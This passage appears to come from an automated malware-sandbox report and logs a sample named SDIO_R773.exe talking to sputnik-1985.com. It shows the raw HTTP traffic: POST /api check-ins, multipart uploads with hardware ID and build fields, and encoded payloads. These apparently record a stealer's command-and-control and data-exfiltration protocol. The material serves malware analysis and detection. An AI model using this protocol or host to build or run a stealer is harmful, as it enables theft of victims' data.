                                                                                                                                                                                                                                            Data Ascii: oter-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.449735104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC353OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 44
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC44OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 32 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--02&j=
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=3o9a94m7n0oj3ug004n5r22muh; expires=Wed, 07 May 2025 04:42:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNmdtp1or6HJe5jqPtTV9K3uM4wgoh1X6kPvYm2O%2FzOWMSyY1HhmkSurSFRn22xL41MQBr44KZcc7AzTjprZMyqw%2BgcSPMqZGxN60uC1A%2BJDpIlB08cPKiGmETwQPtP11dYl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 90046103a828c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1648&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1033&delivery_rate=1729857&cwnd=155&unsent_bytes=0&cid=740f9ed7565b63ed&ts=510&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC247INData Raw: 34 36 62 0d 0a 68 4e 73 4e 5a 39 63 50 2f 6b 70 69 34 77 63 71 67 6f 6b 43 48 5a 2b 64 4a 6e 69 6e 6b 68 7a 2b 54 6f 43 61 70 55 65 55 43 42 54 2f 2b 58 74 46 37 54 76 53 61 42 47 47 4a 52 44 32 2b 33 64 34 73 37 39 48 48 49 57 6f 65 70 38 69 38 2f 2b 4a 5a 65 4a 6c 4e 72 36 39 62 41 75 6b 61 74 4a 6f 42 35 73 6c 45 4e 6e 79 49 48 6a 78 76 78 78 61 77 76 68 2b 6e 79 4c 69 2b 38 34 6f 35 47 52 33 37 4c 64 71 44 37 4a 73 6d 69 73 4f 6a 6d 4a 50 35 2b 68 6f 63 2f 62 77 54 68 57 46 76 6a 36 62 4e 4b 4b 67 68 77 72 78 66 48 58 4a 75 6e 34 4d 39 58 4c 53 4d 55 43 47 61 51 69 34 71 32 4e 34 2f 66 46 41 48 4d 7a 36 64 4a 59 71 34 2f 37 50 4e 2f 31 75 66 4f 79 35 61 51 36 34 5a 59 34 6d 42 49 6c 70 53 65 33 6f 49 44 47 39 2b 46 78 61 6e 62
                                                                                                                                                                                                                                            Data Ascii: 46bhNsNZ9cP/kpi4wcqgokCHZ+dJninkhz+ToCapUeUCBT/+XtF7TvSaBGGJRD2+3d4s79HHIWoep8i8/+JZeJlNr69bAukatJoB5slENnyIHjxvxxawvh+nyLi+84o5GR37LdqD7JsmisOjmJP5+hoc/bwThWFvj6bNKKghwrxfHXJun4M9XLSMUCGaQi4q2N4/fFAHMz6dJYq4/7PN/1ufOy5aQ64ZY4mBIlpSe3oIDG9+Fxanb
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC891INData Raw: 41 74 72 69 2f 7a 36 64 49 6f 35 6d 77 32 2b 66 64 32 52 62 4a 68 33 48 42 41 69 57 6c 47 35 65 68 76 65 50 7a 2f 56 68 58 46 38 33 61 55 4b 4f 6a 33 79 43 72 34 59 48 48 75 73 47 67 4b 73 6d 57 61 4a 77 50 42 4b 77 6a 6e 38 79 41 6e 76 64 39 55 47 63 62 6b 63 34 31 73 2f 62 62 65 5a 66 46 6d 4e 72 37 35 61 51 75 30 59 4a 77 36 43 49 70 75 54 66 4c 67 61 58 4c 77 2f 30 6b 51 79 76 4e 2b 6d 79 62 6f 39 38 30 68 2b 32 64 77 35 72 6b 76 53 2f 56 71 68 47 68 59 77 55 5a 4e 38 4f 78 73 61 62 2f 46 42 41 57 4c 36 54 36 62 49 4b 4b 67 68 79 33 7a 61 58 58 74 74 6d 77 4e 76 6e 2b 63 4f 67 61 4d 59 46 72 6d 37 6d 35 31 2f 75 31 4f 46 4d 50 7a 64 35 63 6c 35 2f 2f 44 5a 62 67 71 63 66 37 35 4e 30 57 55 59 4a 63 6b 43 70 5a 6c 43 50 2b 6c 65 54 2f 36 38 77 52 43 68
                                                                                                                                                                                                                                            Data Ascii: Atri/z6dIo5mw2+fd2RbJh3HBAiWlG5ehvePz/VhXF83aUKOj3yCr4YHHusGgKsmWaJwPBKwjn8yAnvd9UGcbkc41s/bbeZfFmNr75aQu0YJw6CIpuTfLgaXLw/0kQyvN+mybo980h+2dw5rkvS/VqhGhYwUZN8Oxsab/FBAWL6T6bIKKghy3zaXXttmwNvn+cOgaMYFrm7m51/u1OFMPzd5cl5//DZbgqcf75N0WUYJckCpZlCP+leT/68wRCh
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1369INData Raw: 31 30 31 38 0d 0a 7a 38 55 4d 4d 68 65 38 77 68 57 7a 6c 39 49 64 39 74 6d 56 35 36 62 46 76 42 4c 46 67 6d 43 6b 4e 6a 57 78 4c 37 4f 64 6f 63 76 48 37 53 78 4c 4e 38 33 61 4f 49 75 7a 2b 77 53 58 7a 4b 6a 69 6d 76 6e 64 46 37 53 32 34 4a 68 65 56 62 67 72 56 36 47 35 78 2b 75 6b 45 42 59 76 70 50 70 73 67 6f 71 43 48 4b 2f 74 68 65 75 47 77 62 67 61 31 5a 35 49 6e 43 6f 6c 74 53 4f 33 71 61 33 66 37 38 6b 38 56 79 76 64 32 6e 79 44 6e 39 63 52 6c 75 43 70 78 2f 76 6b 33 52 5a 42 6a 6e 7a 6b 52 77 31 42 4c 37 75 56 6e 61 62 33 67 43 67 4f 46 39 33 4c 63 64 4b 4c 79 77 43 4c 79 5a 33 7a 6c 76 57 73 49 75 6d 53 56 49 52 4b 4c 61 55 62 79 35 6d 70 36 38 2f 4e 42 46 63 58 78 66 35 49 6d 36 62 69 4a 5a 66 46 79 4e 72 37 35 51 41 69 6c 66 35 59 6a 45 63 4e 51
                                                                                                                                                                                                                                            Data Ascii: 1018z8UMMhe8whWzl9Id9tmV56bFvBLFgmCkNjWxL7OdocvH7SxLN83aOIuz+wSXzKjimvndF7S24JheVbgrV6G5x+ukEBYvpPpsgoqCHK/theuGwbga1Z5InColtSO3qa3f78k8Vyvd2nyDn9cRluCpx/vk3RZBjnzkRw1BL7uVnab3gCgOF93LcdKLywCLyZ3zlvWsIumSVIRKLaUby5mp68/NBFcXxf5Im6biJZfFyNr75QAilf5YjEcNQ
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1369INData Raw: 41 6e 76 64 42 48 44 4d 2b 77 59 64 49 31 6f 76 2f 4c 5a 61 34 71 66 4f 71 39 62 41 6d 38 59 5a 45 70 42 49 5a 6f 54 4f 44 74 5a 6e 72 38 39 45 77 57 79 76 70 79 6d 43 44 72 2f 73 73 6d 39 57 77 32 71 50 6c 6f 48 66 55 31 33 41 6b 4e 69 6d 6c 49 34 2f 70 6e 50 37 4f 2f 53 68 7a 46 73 43 61 4b 50 50 58 2f 32 47 76 76 4b 6e 48 71 2b 54 64 46 76 33 2b 5a 4a 67 53 4c 59 45 7a 73 34 57 42 36 37 2f 64 43 48 63 6e 34 65 35 4d 71 35 2f 58 41 4c 76 56 34 5a 4f 57 39 59 51 6e 31 49 39 77 76 47 4d 45 39 43 4d 58 38 59 32 2f 37 2f 41 51 46 69 2b 6b 2b 6d 79 43 69 6f 49 63 6c 2b 47 5a 39 34 62 4a 6b 41 62 46 74 6b 53 4d 4f 6a 32 78 45 36 4f 64 6e 62 66 44 36 54 42 44 4d 39 58 4b 52 4c 2f 44 37 78 6d 57 34 4b 6e 48 2b 2b 54 64 46 6b 6c 36 72 43 30 43 65 4b 31 47 67 37
                                                                                                                                                                                                                                            Data Ascii: AnvdBHDM+wYdI1ov/LZa4qfOq9bAm8YZEpBIZoTODtZnr89EwWyvpymCDr/ssm9Ww2qPloHfU13AkNimlI4/pnP7O/ShzFsCaKPPX/2GvvKnHq+TdFv3+ZJgSLYEzs4WB67/dCHcn4e5Mq5/XALvV4ZOW9YQn1I9wvGME9CMX8Y2/7/AQFi+k+myCioIcl+GZ94bJkAbFtkSMOj2xE6OdnbfD6TBDM9XKRL/D7xmW4KnH++TdFkl6rC0CeK1Gg7
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1369INData Raw: 2f 61 42 6e 4b 2b 7a 36 44 59 76 75 34 77 43 6d 32 4d 6a 62 68 73 57 63 4c 74 6d 75 58 4a 41 79 41 62 45 37 6c 34 32 64 77 2b 76 5a 44 47 73 50 69 65 5a 45 6c 34 76 50 4f 4c 2f 4a 72 66 61 62 33 4c 77 4b 74 4c 63 52 6f 4d 6f 5a 7a 57 4f 4f 72 66 7a 48 6b 76 30 4d 57 68 61 67 2b 6b 54 37 6a 2f 64 55 68 2b 57 46 6b 37 62 39 76 41 4b 64 71 6b 43 49 50 67 6d 31 46 34 2b 4e 79 66 2f 44 2f 56 67 6a 44 2b 33 44 63 59 71 4c 2f 33 32 57 75 4b 6b 66 78 73 69 38 61 2b 33 54 63 4c 77 7a 42 50 51 6a 6a 34 57 31 78 37 2f 74 43 45 63 62 2b 64 70 6b 6b 35 76 4c 4b 4b 76 31 67 66 2b 36 35 59 41 43 39 5a 70 6f 6d 41 59 64 70 52 61 43 6c 49 48 6a 6c 76 78 78 61 34 75 70 7a 6d 6a 76 7a 7a 63 41 6c 70 79 70 70 71 4b 41 76 41 72 6b 74 78 47 67 4e 6a 57 39 46 35 65 39 6f 65 50
                                                                                                                                                                                                                                            Data Ascii: /aBnK+z6DYvu4wCm2MjbhsWcLtmuXJAyAbE7l42dw+vZDGsPieZEl4vPOL/Jrfab3LwKtLcRoMoZzWOOrfzHkv0MWhag+kT7j/dUh+WFk7b9vAKdqkCIPgm1F4+Nyf/D/VgjD+3DcYqL/32WuKkfxsi8a+3TcLwzBPQjj4W1x7/tCEcb+dpkk5vLKKv1gf+65YAC9ZpomAYdpRaClIHjlvxxa4upzmjvzzcAlpyppqKAvArktxGgNjW9F5e9oeP
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC21INData Raw: 68 66 64 79 33 48 53 69 39 73 6f 6a 39 32 74 2b 37 72 6c 0d 0a
                                                                                                                                                                                                                                            Data Ascii: hfdy3HSi9soj92t+7rl
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1369INData Raw: 38 33 33 0d 0a 70 44 37 46 75 6c 53 73 48 69 47 4e 44 34 2b 46 76 65 50 76 37 52 42 48 43 2f 6e 69 5a 4a 2b 75 34 69 57 58 78 63 6a 61 2b 2b 55 6b 6d 70 33 2b 75 4a 67 4f 61 4a 56 65 75 38 69 42 34 38 62 38 63 57 73 37 34 63 59 34 70 36 2f 44 44 4c 50 5a 75 66 4f 75 2b 62 77 43 34 61 4a 67 6d 42 49 5a 6c 52 4f 2f 73 61 48 44 35 2f 30 74 61 69 37 42 35 68 47 79 36 75 4f 63 75 34 45 74 34 37 61 73 76 47 76 74 30 33 43 38 4d 77 54 30 49 37 75 4a 68 64 2f 50 7a 54 42 37 58 38 48 57 56 49 2b 50 33 78 79 62 33 59 48 37 30 76 32 38 4f 76 57 71 55 4c 41 36 54 5a 45 65 67 70 53 42 34 35 62 38 63 57 76 54 6d 65 5a 73 6a 6f 4e 48 41 50 76 64 67 64 65 32 31 4c 78 72 37 64 4e 77 76 44 4d 45 39 43 4f 33 6e 62 58 76 76 38 30 51 61 7a 50 64 30 6a 69 50 74 39 63 51 6c 38
                                                                                                                                                                                                                                            Data Ascii: 833pD7FulSsHiGND4+FvePv7RBHC/niZJ+u4iWXxcja++Ukmp3+uJgOaJVeu8iB48b8cWs74cY4p6/DDLPZufOu+bwC4aJgmBIZlRO/saHD5/0tai7B5hGy6uOcu4Et47asvGvt03C8MwT0I7uJhd/PzTB7X8HWVI+P3xyb3YH70v28OvWqULA6TZEegpSB45b8cWvTmeZsjoNHAPvdgde21Lxr7dNwvDME9CO3nbXvv80QazPd0jiPt9cQl8
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC737INData Raw: 34 5a 51 6d 30 61 70 73 6a 45 6f 70 33 51 2b 6a 6f 62 6e 66 30 2f 30 6f 61 78 50 31 2b 33 47 4b 69 2f 39 39 6c 72 69 70 54 78 61 35 35 44 2f 64 4f 69 7a 34 4b 68 6d 6c 65 36 2b 70 6a 61 66 44 76 42 46 53 46 34 58 6d 4e 62 4c 72 75 31 7a 4c 78 64 54 6a 2f 2b 57 67 4a 39 54 58 63 49 77 2b 50 61 45 50 6b 34 6d 56 33 2f 76 70 42 45 4d 6e 38 66 35 51 6c 36 50 33 43 49 2f 78 70 65 4f 6d 34 59 77 47 38 59 35 56 6f 54 73 46 69 55 4b 43 7a 49 45 6e 74 2b 46 77 58 31 62 4a 4d 6e 7a 33 7a 37 63 6f 31 38 43 68 5a 35 62 56 73 41 4c 4a 39 33 44 64 4f 6d 43 56 50 37 4b 73 34 50 2f 33 37 53 42 6e 43 2f 6e 47 52 49 2b 58 7a 79 43 2f 34 65 48 6e 6a 73 57 4d 4e 75 48 2b 57 49 68 4b 49 62 45 58 75 34 33 4a 38 76 62 45 45 48 64 32 77 4a 74 77 65 36 50 76 4c 4d 2f 74 6c 4e 76
                                                                                                                                                                                                                                            Data Ascii: 4ZQm0apsjEop3Q+jobnf0/0oaxP1+3GKi/99lripTxa55D/dOiz4Khmle6+pjafDvBFSF4XmNbLru1zLxdTj/+WgJ9TXcIw+PaEPk4mV3/vpBEMn8f5Ql6P3CI/xpeOm4YwG8Y5VoTsFiUKCzIEnt+FwX1bJMnz3z7co18ChZ5bVsALJ93DdOmCVP7Ks4P/37SBnC/nGRI+XzyC/4eHnjsWMNuH+WIhKIbEXu43J8vbEEHd2wJtwe6PvLM/tlNv
                                                                                                                                                                                                                                            2025-01-11 10:56:13 UTC1369INData Raw: 38 32 61 0d 0a 50 50 4a 55 7a 78 71 7a 67 76 72 36 51 52 53 5a 4b 67 4c 49 4e 69 2b 37 6a 52 5a 61 34 34 4f 4b 61 72 4c 31 33 31 4b 70 38 36 45 6f 64 6d 58 75 4f 73 58 6b 48 61 35 55 6b 63 30 75 46 41 6f 69 76 34 39 63 45 79 35 79 5a 6a 35 62 64 68 41 71 4d 74 30 6d 67 50 77 54 31 78 6f 4b 4d 67 51 4c 4f 2f 58 46 71 64 73 45 75 66 49 75 7a 2f 30 54 53 37 54 57 7a 72 76 33 67 55 39 53 50 63 4c 6b 44 5a 4e 77 61 67 37 33 45 2f 70 61 38 57 51 5a 43 6a 4b 63 78 2b 2f 62 62 65 5a 65 41 71 4c 72 54 33 4c 78 66 31 4e 64 78 76 41 35 4e 33 54 75 50 39 59 7a 6a 44 77 57 6f 64 77 2f 56 35 6a 47 37 4d 38 39 4d 69 74 69 51 32 36 66 6b 33 50 50 55 6c 33 42 64 4f 77 58 30 49 75 4b 74 56 66 50 50 78 51 77 7a 55 76 56 43 62 4b 75 66 2f 31 32 66 59 59 57 4c 68 2b 53 46 46
                                                                                                                                                                                                                                            Data Ascii: 82aPPJUzxqzgvr6QRSZKgLINi+7jRZa44OKarL131Kp86EodmXuOsXkHa5Ukc0uFAoiv49cEy5yZj5bdhAqMt0mgPwT1xoKMgQLO/XFqdsEufIuz/0TS7TWzrv3gU9SPcLkDZNwag73E/pa8WQZCjKcx+/bbeZeAqLrT3Lxf1NdxvA5N3TuP9YzjDwWodw/V5jG7M89MitiQ26fk3PPUl3BdOwX0IuKtVfPPxQwzUvVCbKuf/12fYYWLh+SFF


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.449736104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:14 UTC365OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=K8TVJ8YTUGNJ
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 18124
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:14 UTC15331OUTData Raw: 2d 2d 4b 38 54 56 4a 38 59 54 55 47 4e 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 4b 38 54 56 4a 38 59 54 55 47 4e 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 38 54 56 4a 38 59 54 55 47 4e 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 4b 38 54 56 4a 38 59 54 55 47 4e 4a 0d 0a 43 6f 6e
                                                                                                                                                                                                                                            Data Ascii: --K8TVJ8YTUGNJContent-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--K8TVJ8YTUGNJContent-Disposition: form-data; name="pid"2--K8TVJ8YTUGNJContent-Disposition: form-data; name="lid"BbL7Kk--02--K8TVJ8YTUGNJCon
                                                                                                                                                                                                                                            2025-01-11 10:56:14 UTC2793OUTData Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15
                                                                                                                                                                                                                                            Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                                                                                                                                                                            2025-01-11 10:56:27 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:26 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=poqinmivl27ir64meje38dvqqm; expires=Wed, 07 May 2025 04:43:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0gMAWU41aeR6Jn%2FX9loZWIxCX1ddZKJnv5ktZPgwq97Oi4pYM93HGNgolhvt5hDH%2BpoVAn8W1k%2BbthjKVpP%2B6%2B%2BTe6M37Zh3tqoCPUIxQ1K3P1pwE2U7%2BVxCY6L2m491utk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004610d2bd3c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1636&rtt_var=637&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19169&delivery_rate=1685912&cwnd=155&unsent_bytes=0&cid=4f6f2ec3194436b8&ts=12198&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-11 10:56:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.449743104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:27 UTC361OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=TWFBAMJXU
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8727
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:27 UTC8727OUTData Raw: 2d 2d 54 57 46 42 41 4d 4a 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 54 57 46 42 41 4d 4a 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 57 46 42 41 4d 4a 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 54 57 46 42 41 4d 4a 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                                                                                                                            Data Ascii: --TWFBAMJXUContent-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--TWFBAMJXUContent-Disposition: form-data; name="pid"2--TWFBAMJXUContent-Disposition: form-data; name="lid"BbL7Kk--02--TWFBAMJXUContent-Disposi
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nu9f7vovhnikukveij6p6866v8; expires=Wed, 07 May 2025 04:43:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FBugpGCWnyJ9goxeBhdUm5QQcPWIWpbOaWbA04345pIbLVNYbp3nOqWnxh0a5yVA9tFnqpgyGonJkjaPN3uWNWJVyyMkX8CdgGMBdNDdqxFKD0b052QlOaXGO2lqE4rF9yp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004615cef2cc358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1619&rtt_var=618&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9746&delivery_rate=1755862&cwnd=155&unsent_bytes=0&cid=57ff7d5b036dc8fc&ts=506&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-11 10:56:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


